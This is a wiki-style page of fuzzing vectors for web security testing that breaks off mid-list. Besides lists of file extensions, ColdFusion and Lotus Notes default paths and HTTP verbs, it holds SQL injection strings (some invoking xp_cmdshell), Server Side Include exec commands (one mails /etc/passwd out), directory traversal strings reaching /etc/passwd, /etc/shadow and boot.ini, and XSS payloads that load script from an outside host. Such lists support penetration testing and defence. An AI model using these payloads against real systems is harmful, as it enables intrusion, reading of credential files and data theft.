.ptz<br />
.q07<br />
.q3d<br />
.qbw<br />
.qdat<br />
.qdf<br />
.qfx<br />
.qpf<br />
.qpw<br />
.qsd<br />
.rcd<br />
.rdx<br />
.ref<br />
.rmuf<br />
.roi<br />
.rrt<br />
.rvt<br />
.rwg<br />
.saf<br />
.sam07<br />
.sbd<br />
.sbf<br />
.sbq<br />
.sbt<br />
.sdb<br />
.sdc<br />
.sdf<br />
.sds<br />
.ser<br />
.sgn<br />
.shs<br />
.skc<br />
.slk<br />
.sonic<br />
.soundpack<br />
.spo<br />
.sql<br />
.stf<br />
.stl<br />
.stm<br />
.sy3<br />
.t08<br />
.t09<br />
.t2<br />
.tax2009<br />
.tdl<br />
.tdt<br />
.te<br />
.teacher<br />
.tmw<br />
.tol<br />
.trk<br />
.trs<br />
.trx<br />
.tsv<br />
.uccapilog<br />
.ud<br />
.udeb<br />
.uds<br />
.update<br />
.uwl<br />
.val<br />
.vcf<br />
.vdb<br />
.vfs<br />
.vip<br />
.vle<br />
.vlg<br />
.vxml<br />
.w02<br />
.wab<br />
.wb1<br />
.wb3<br />
.wdq<br />
.wfd<br />
.wfm<br />
.windowslivecontact<br />
.wk1<br />
.wk2<br />
.wk3<br />
.wk4<br />
.wk5<br />
.wke<br />
.wks<br />
.wlmp<br />
.wpc<br />
.wpo<br />
.wq1<br />
.wq2<br />
.wtr<br />
.xbk<br />
.xdb<br />
.xds<br />
.xfd<br />
.xl<br />
.xlgc<br />
.xlr<br />
.xls<br />
.xlsx<br />
.xltm<br />
.xltx<br />
.xml<br />
.xmpz<br />
.xsl<br />
.xsn<br />
.xtm<br />
.xtp<br />
.xxd<br />
.{pb<br />
.~hm<br />
</pre><br />
<br />
=== Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65) ===<br />
<pre><br />
# Cold Fusion Default Files - (Update: 16 March 2010 - Total Statements: 65)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
CFIDE/Administrator/<br />
CFIDE/Administrator/index.cfm<br />
CFIDE/Administrator/login.cfm<br />
CFIDE/Administrator/Application.cfm<br />
CFIDE/Application.cfm<br />
CFIDE/adminapi/<br />
CFIDE/adminapi/Application.cfm<br />
CFIDE/adminapi/administrator.cfc<br />
CFIDE/adminapi/base.cfc<br />
CFIDE/adminapi/customtags/<br />
CFIDE/adminapi/customtags/l10n.cfm<br />
CFIDE/adminapi/customtags/resources<br />
CFIDE/adminapi/customtags/resources/<br />
CFIDE/adminapi/datasource.cfc<br />
CFIDE/adminapi/debugging.cfc<br />
CFIDE/adminapi/eventgateway.cfc<br />
CFIDE/adminapi/extensions.cfc<br />
CFIDE/adminapi/mail.cfc<br />
CFIDE/adminapi/runtime.cfc<br />
CFIDE/adminapi/security.cfc<br />
CFIDE/adminapi/_datasource/<br />
CFIDE/adminapi/_datasource/formatjdbcurl.cfm<br />
CFIDE/adminapi/_datasource/getaccessdefaultsfromregistry.cfm<br />
CFIDE/adminapi/_datasource/geturldefaults.cfm<br />
CFIDE/adminapi/_datasource/setdsn.cfm<br />
CFIDE/adminapi/_datasource/setmsaccessregistry.cfm<br />
CFIDE/adminapi/_datasource/setsldatasource.cfm<br />
CFIDE/classes/<br />
CFIDE/classes/cf-j2re-win.cab<br />
CFIDE/classes/cfapplets.jar<br />
CFIDE/classes/images<br />
CFIDE/componentutils/<br />
CFIDE/componentutils/Application.cfm<br />
CFIDE/componentutils/cfcexplorer.cfc<br />
CFIDE/componentutils/cfcexplorer_utils.cfm<br />
CFIDE/componentutils/componentdetail.cfm<br />
CFIDE/componentutils/componentdoc.cfm<br />
CFIDE/componentutils/componentlist.cfm<br />
CFIDE/componentutils/gatewaymenu<br />
CFIDE/componentutils/gatewaymenu/<br />
CFIDE/componentutils/gatewaymenu/menu.cfc<br />
CFIDE/componentutils/gatewaymenu/menunode.cfc<br />
CFIDE/componentutils/login.cfm<br />
CFIDE/componentutils/packagelist.cfm<br />
CFIDE/componentutils/utils.cfc<br />
CFIDE/componentutils/_component_cfcToHTML.cfm<br />
CFIDE/componentutils/_component_cfcToMCDL.cfm?<br />
CFIDE/componentutils/_component_style.cfm<br />
CFIDE/componentutils/_component_utils.cfm<br />
CFIDE/debug/<br />
CFIDE/debug/images/<br />
CFIDE/debug/includes/<br />
CFIDE/images/<br />
CFIDE/images/skins/<br />
CFIDE/install.cfm<br />
CFIDE/installers/<br />
CFIDE/installers/CFMX7DreamWeaverExtensions.mxp<br />
CFIDE/installers/CFReportBuilderInstaller.exe<br />
CFIDE/probe.cfm<br />
CFIDE/scripts/<br />
CFIDE/scripts/css/<br />
CFIDE/scripts/xsl/<br />
CFIDE/wizards/<br />
CFIDE/wizards/common/<br />
CFIDE/wizards/common/utils.cfc</pre><br />
<br />
=== All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31) ===<br />
<pre><br />
# All HTTP Verbs Defined in RFC's + 1 ARBITRARY Verb - (Update: 16 March 2009 - Total Statements: 31)<br />
# adam.muntner@quietmove.com<br />
# creative commons<br />
<br />
OPTIONS<br />
GET<br />
HEAD<br />
POST<br />
PUT<br />
DELETE<br />
TRACE<br />
CONNECT<br />
PROPFIND<br />
PROPPATCH<br />
MKCOL<br />
COPY<br />
MOVE<br />
LOCK<br />
UNLOCK<br />
VERSION-CONTROL<br />
REPORT<br />
CHECKOUT<br />
CHECKIN<br />
UNCHECKOUT<br />
MKWORKSPACE<br />
UPDATE<br />
LABEL<br />
MERGE<br />
BASELINE-CONTROL<br />
MKACTIVITY<br />
ORDERPATCH<br />
ACL<br />
PATCH<br />
SEARCH<br />
ARBITRARY<br />
</pre><br />
<br />
=== Lotus/Notes Files -(Update: 02 February 2010 - Total Statements: 111) ===<br />
<pre>/852566C90012664F<br />
/admin4.nsf<br />
/admin5.nsf<br />
/admin.nsf<br />
/agentrunner.nsf<br />
/alog.nsf<br />
/a_domlog.nsf<br />
/bookmark.nsf<br />
/busytime.nsf<br />
/catalog.nsf<br />
/certa.nsf<br />
/certlog.nsf<br />
/certsrv.nsf<br />
/chatlog.nsf<br />
/clbusy.nsf<br />
/cldbdir.nsf<br />
/clusta4.nsf<br />
/collect4.nsf<br />
/da.nsf<br />
/dba4.nsf<br />
/dclf.nsf<br />
/DEASAppDesign.nsf<br />
/DEASLog01.nsf<br />
/DEASLog02.nsf<br />
/DEASLog03.nsf<br />
/DEASLog04.nsf<br />
/DEASLog05.nsf<br />
/DEASLog.nsf<br />
/decsadm.nsf<br />
/decslog.nsf<br />
/DEESAdmin.nsf<br />
/dirassist.nsf<br />
/doladmin.nsf<br />
/domadmin.nsf<br />
/domcfg.nsf<br />
/domguide.nsf<br />
/domlog.nsf<br />
/dspug.nsf<br />
/events4.nsf<br />
/events5.nsf<br />
/events.nsf<br />
/event.nsf<br />
/homepage.nsf<br />
/iNotes/Forms5.nsf/$DefaultNav<br />
/jotter.nsf<br />
/leiadm.nsf<br />
/leilog.nsf<br />
/leivlt.nsf<br />
/log4a.nsf<br />
/log.nsf<br />
/l_domlog.nsf<br />
/mab.nsf<br />
/mail10.box<br />
/mail1.box<br />
/mail2.box<br />
/mail3.box<br />
/mail4.box<br />
/mail5.box<br />
/mail6.box<br />
/mail7.box<br />
/mail8.box<br />
/mail9.box<br />
/mail.box<br />
/msdwda.nsf<br />
/mtatbls.nsf<br />
/mtstore.nsf<br />
/names.nsf<br />
/nntppost.nsf<br />
/nntp/nd000001.nsf<br />
/nntp/nd000002.nsf<br />
/nntp/nd000003.nsf<br />
/ntsync45.nsf<br />
/perweb.nsf<br />
/qpadmin.nsf<br />
/quickplace/quickplace/main.nsf<br />
/reports.nsf<br />
/sample/siregw46.nsf<br />
/schema50.nsf<br />
/setupweb.nsf<br />
/setup.nsf<br />
/smbcfg.nsf<br />
/smconf.nsf<br />
/smency.nsf<br />
/smhelp.nsf<br />
/smmsg.nsf<br />
/smquar.nsf<br />
/smsolar.nsf<br />
/smtime.nsf<br />
/smtpibwq.nsf<br />
/smtpobwq.nsf<br />
/smtp.box<br />
/smtp.nsf<br />
/smvlog.nsf<br />
/srvnam.htm<br />
/statmail.nsf<br />
/statrep.nsf<br />
/stauths.nsf<br />
/stautht.nsf<br />
/stconfig.nsf<br />
/stconf.nsf<br />
/stdnaset.nsf<br />
/stdomino.nsf<br />
/stlog.nsf<br />
/streg.nsf<br />
/stsrc.nsf<br />
/userreg.nsf<br />
/vpuserinfo.nsf<br />
/webadmin.nsf<br />
/web.nsf<br />
/.nsf/../winnt/win.ini<br />
/?Open <br />
</pre><br />
<br />
=== SQL Injection -(Update: 11 August 2009 - Total Statements: 126) ===<br />
<pre>Statement<br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
"a"" or 1=1--"<br />
or a = a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q = 0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A0031003000270000<br />
declare @s varchar(22) select @s = 0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
'<br />
'%20or%20''='<br />
'%20or%20'x'='x<br />
%20or%20x=x<br />
')%20or%20('x'='x<br />
0 or 1=1<br />
' or 0=0 --<br />
" or 0=0 --<br />
or 0=0 --<br />
' or 0=0 #<br />
or 0=0 #"<br />
or 0=0 #<br />
' or 1=1--<br />
" or 1=1--<br />
' or '1'='1'--<br />
' or 1 --'<br />
or 1=1--<br />
or%201=1<br />
or%201=1 --<br />
' or 1=1 or ''='<br />
or 1=1 or ""=<br />
' or a=a--<br />
or a=a<br />
') or ('a'='a<br />
) or (a=a<br />
hi or a=a<br />
hi or 1=1 --"<br />
hi' or 1=1 --<br />
hi' or 'a'='a<br />
hi') or ('a'='a<br />
"hi"") or (""a""=""a"<br />
'hi' or 'x'='x';<br />
@variable<br />
,@variable<br />
PRINT<br />
PRINT @@variable<br />
select<br />
insert<br />
as<br />
or<br />
procedure<br />
limit<br />
order by<br />
asc<br />
desc<br />
delete<br />
update<br />
distinct<br />
having<br />
truncate<br />
replace<br />
like<br />
handler<br />
bfilename<br />
' or username like '%<br />
' or uname like '%<br />
' or userid like '%<br />
' or uid like '%<br />
' or user like '%<br />
exec xp<br />
exec sp<br />
'; exec master..xp_cmdshell<br />
'; exec xp_regread<br />
t'exec master..xp_cmdshell 'nslookup www.google.com'--<br />
--sp_password<br />
\x27UNION SELECT<br />
' UNION SELECT<br />
' UNION ALL SELECT<br />
' or (EXISTS)<br />
' (select top 1<br />
'||UTL_HTTP.REQUEST<br />
1;SELECT%20*<br />
to_timestamp_tz<br />
tz_offset<br />
&lt;&gt;"'%;)(&amp;+<br />
'%20or%201=1<br />
%27%20or%201=1<br />
%20$(sleep%2050)<br />
%20'sleep%2050'<br />
char%4039%41%2b%40SELECT<br />
&amp;apos;%20OR<br />
'sqlattempt1<br />
(sqlattempt2)<br />
|<br />
%7C<br />
*|<br />
%2A%7C<br />
*(|(mail=*))<br />
%2A%28%7C%28mail%3D%2A%29%29<br />
*(|(objectclass=*))<br />
%2A%28%7C%28objectclass%3D%2A%29%29<br />
(<br />
%28<br />
)<br />
%29<br />
&amp;<br />
%26<br />
!<br />
%21<br />
' or 1=1 or ''='<br />
' or ''='<br />
x' or 1=1 or 'x'='y<br />
/<br />
//<br />
//*<br />
*/*<br />
a' or 3=3--<br />
"a"" or 3=3--"<br />
' or 3=3<br />
‘ or 3=3 --<br />
</pre> <br />
=== SSI (Server Side Includes) - (Update: xx/xx/xx - Total Statements: 4) ===<br />
<pre>&lt;!--#exec cmd="/bin/ls /" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="cat /etc/passwd" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="find / -name *.* -print" --&gt;&lt;br/&gt;<br />
&lt;!--#exec cmd="mail Foobar@email.de &lt;mailto:Foobar@email.de&gt; &lt; cat /etc/passwd" --&gt;&lt;br/&gt;<br />
</pre> <br />
=== Directory Traversal - (Update: 11 August 2009 - Total Statements: 132) ===<br />
<pre>Statement<br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
../../../../../../../../../../../../etc/hosts%00<br />
../../../../../../../../../../../../etc/hosts<br />
../../boot.ini<br />
/../../../../../../../../%2A<br />
../../../../../../../../../../../../etc/passwd%00<br />
../../../../../../../../../../../../etc/passwd<br />
../../../../../../../../../../../../etc/shadow%00<br />
../../../../../../../../../../../../etc/shadow<br />
/../../../../../../../../../../etc/passwd^^<br />
/../../../../../../../../../../etc/shadow^^<br />
/../../../../../../../../../../etc/passwd<br />
/../../../../../../../../../../etc/shadow<br />
/./././././././././././etc/passwd<br />
/./././././././././././etc/shadow<br />
\..\..\..\..\..\..\..\..\..\..\etc\passwd<br />
\..\..\..\..\..\..\..\..\..\..\etc\shadow<br />
..\..\..\..\..\..\..\..\..\..\etc\passwd<br />
..\..\..\..\..\..\..\..\..\..\etc\shadow<br />
/..\../..\../..\../..\../..\../..\../etc/passwd<br />
/..\../..\../..\../..\../..\../..\../etc/shadow<br />
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd<br />
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow<br />
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00<br />
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00<br />
..\..\..\..\..\..\..\..\..\..\etc\passwd%00<br />
..\..\..\..\..\..\..\..\..\..\etc\shadow%00<br />
%0a/bin/cat%20/etc/passwd<br />
%0a/bin/cat%20/etc/shadow<br />
%00/etc/passwd%00<br />
%00/etc/shadow%00<br />
%00../../../../../../etc/passwd<br />
%00../../../../../../etc/shadow<br />
/../../../../../../../../../../../etc/passwd%00.jpg<br />
/../../../../../../../../../../../etc/passwd%00.html<br />
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd<br />
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow<br />
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00<br />
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00<br />
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%<br />
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini<br />
\\&amp;apos;/bin/cat%20/etc/passwd\\&amp;apos;<br />
\\&amp;apos;/bin/cat%20/etc/shadow\\&amp;apos;<br />
../../../../../../../../conf/server.xml<br />
/../../../../../../../../bin/id|<br />
C:/inetpub/wwwroot/global.asa<br />
C:\inetpub\wwwroot\global.asa<br />
C:/boot.ini<br />
C:\boot.ini<br />
../../../../../../../../../../../../localstart.asp%00<br />
../../../../../../../../../../../../localstart.asp<br />
../../../../../../../../../../../../boot.ini%00<br />
../../../../../../../../../../../../boot.ini<br />
/./././././././././././boot.ini<br />
/../../../../../../../../../../../boot.ini%00<br />
/../../../../../../../../../../../boot.ini<br />
/..\../..\../..\../..\../..\../..\../boot.ini<br />
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini<br />
\..\..\..\..\..\..\..\..\..\..\boot.ini<br />
..\..\..\..\..\..\..\..\..\..\boot.ini%00<br />
..\..\..\..\..\..\..\..\..\..\boot.ini<br />
/../../../../../../../../../../../boot.ini%00.html<br />
/../../../../../../../../../../../boot.ini%00.jpg<br />
/.../.../.../.../.../<br />
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini<br />
</pre> <br />
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".'' <br />
<br />
=== XSS Discovery Statements ===<br />
<br />
Discovery Statements<br />
<pre># Discovery Statements (July 2007)<br />
# Statements used to cause exploitable errors<br />
# Foobar@email.de<br />
<br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; <br />
'';!--"&lt;XSS&gt;=&amp;{()}<br />
</pre> <br />
<br />
Common exploit code <br />
<pre># Best Statements (July 2007)<br />
# Statements covering 90% of all vulnerabilities <br />
# Foobar@email.de<br />
<br />
'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt='<br />
"&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt="<br />
\'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt=\'<br />
'); alert('xss'); var x='<br />
\\'); alert(\'xss\');var x=\'<br />
//--&gt;&lt;/SCRIPT&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83));<br />
</pre><br />
<br />
Full List - (Update: 11 August 2009 - Total Statements: 162) <br />
<pre># Full List (July 2007)<br />
# All Statements - Full List <br />
# Based on the XSS cheat sheet <br />
# http://ha.ckers.org/xss.html<br />
# Foobar@email.de<br />
<br />
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;<br />
"&lt;IMG SRC=""javascript:alert('XSS');""&gt;"<br />
&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;<br />
"&lt;IMG SRC=javascript:alert(""XSS"")&gt;"<br />
"&lt;IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`&gt;"<br />
"&lt;IMG """"""&gt;&lt;SCRIPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;"<br />
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;<br />
&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;<br />
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
"&lt;IMG SRC=""jav"<br />
"ascript:alert('XSS');""&gt;"<br />
"perl -e 'print ""&lt;IMG SRC=java\0script:alert(\""XSS\"")&gt;"";' &gt; out"<br />
"perl -e 'print ""&lt;SCR\0IPT&gt;alert(\""XSS\"")&lt;/SCR\0IPT&gt;"";' &gt; out"<br />
"&lt;IMG SRC="" &amp;#14; javascript:alert('XSS');""&gt;"<br />
"&lt;SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(""XSS"")&gt;"<br />
"&lt;SCRIPT/SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;&lt;SCRIPT&gt;alert(""XSS"");//&lt;&lt;/SCRIPT&gt;"<br />
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt;<br />
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;<br />
"&lt;IMG SRC=""javascript:alert('XSS')"""<br />
&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;<br />
&lt;SCRIPT&gt;a=/XSS/\nalert(a.source)&lt;/SCRIPT&gt;<br />
"\"";alert('XSS');//"<br />
"&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(""XSS"");&lt;/SCRIPT&gt;"<br />
"&lt;INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');""&gt;"<br />
"&lt;BODY BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
